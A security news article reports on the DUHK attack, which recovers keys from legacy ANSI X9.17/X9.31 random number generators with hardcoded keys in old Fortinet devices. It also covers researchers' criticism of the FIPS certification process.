DUHK Attack Exposes Gaps in FIPS Certification

The DUHK Attack leverages a 20-year-old random number generator flaw to recover private keys. More pertinent, researchers said, is that the flaw exposes gaps in the FIPS certification process.

Despite the obligatory logo and clever name, this week’s assault on crypto, the so-called DUHK attack (Don’t Use Hardcoded Keys), isn’t likely to be part of many threat models.

Though the attack can be used to passively decrypt VPN and encrypted browser traffic, it relies on a host of implementation errors in admittedly ancient security appliances to trigger a vulnerability known for two decades in a pseudorandom number generator.

And while the issue in the ANSI X9.17/X9.31 PRNG should be patched, in particular on old versions of certain firewall appliances and VPN gateways, there is the much larger issue that the PRNG design was built into a number of crypto standards since it was published in 1985 and that it remained on the FIPS 140-1 and 140-2 lists of approved algorithms for use on government systems until January 2016.

The researchers said in a paper published Monday called “Practical state recovery attacks against legacy RNG implementations,” that a dozen products, below, that are FIPS 140-2 certified contain a static hardcoded key in the source code rendering them vulnerable to this attack. The researchers developed an attack against the Fortinet Fortigate VPN gateways running FortiOS version 4 and were able to recover the private encryption key after a few seconds of computation time.

“We measured the prevalence of this vulnerability on the visible Internet using active scans and find that we are able to recover the random number generator state for 21% of HTTPS hosts serving a default Fortinet product certificate, and 97% of hosts with metadata identifying FortiOSv4,” the researchers wrote. “We successfully demonstrate full private key recovery in the wild against a subset of these hosts that accept IPsec connections.”

Heninger told Threatpost that such an attack would be on the radar of nation states.

“It’s a passive decryption ability in an ancient version of Fortigate (Fortinet) products. If there are sysadmins who are worried about whether they need to patch everything if their company; if they have a vulnerable version of Fortigate, they should apply the patch, otherwise I wouldn’t worry too much because this isn’t something that is going to be exploited by script kiddies,” she said.

The ANSI X9.17/X9.31 PRNG was deprecated by NIST in 2011 and outright banned in January 2016. The core weakness, however, has been known since a 1998 paper written by crypto pioneers John Kelsey, Bruce Schneier, David Wagner and Chris Hall. The paper points out that should an attacker ever learn the static key and some basic raw output, the security offered by the ANSI PRNG would be useless. Green wrote in a blog accompanying the release of the paper in 1998, those experts—Kelsey is still with NIST—thought it was unlikely an attacker could learn the static key.

“If an attacker were to obtain K somehow, and then was able to learn only a single 16-byte raw output block (Ri) from a working PRG, she could do the following: (1) guess the timestamp T, (2) work backwards (decrypting using K) in order to recover the corresponding state value V, and now (3) run the generator forwards or backwards (with guesses for T) to obtain every previous and subsequent output of the generator,” Green wrote. “Thus, if an application uses the ANSI generator to produce something like a random nonce (something that is typically sent in a protocol in clear text), and also uses the generator to produce secret keys, this means an attacker could potentially recover those secret keys and completely break the protocol.”

Heninger questions why the FIPS certification process failed to protect against this two-decades-old attack and why the dozen products identified in the paper were able to pass the same certification process.

“The thing we’re interested in is the broader question of how can we make the certification process more effective to keep these things from happening,” she said. “Why are people still using these ancient algorithms that are much worse than modern random number generator designs decades after they should have been retired.”

Heninger said she hopes that officials who set policy for crypto usage at the government level would pay attention to this research and take steps to retire old algorithms and encourage researchers to examine old standards for similar gaps in security.

“To protect against this type of things, we need to vet implementations more carefully and take a fine-toothed comb to all of the random number generators algorithms out there,” Heninger said. “From a policy perspective, how do you push the entire community away from vulnerable implementations.”

Suggested articles

Cyberattackers Put the Pedal to the Medal: Podcast

Fortinet’s Derek Manky discusses the exponential increase in the speed that attackers weaponize fresh vulnerabilities, where botnets and offensive automation fit in, and the ramifications for security teams.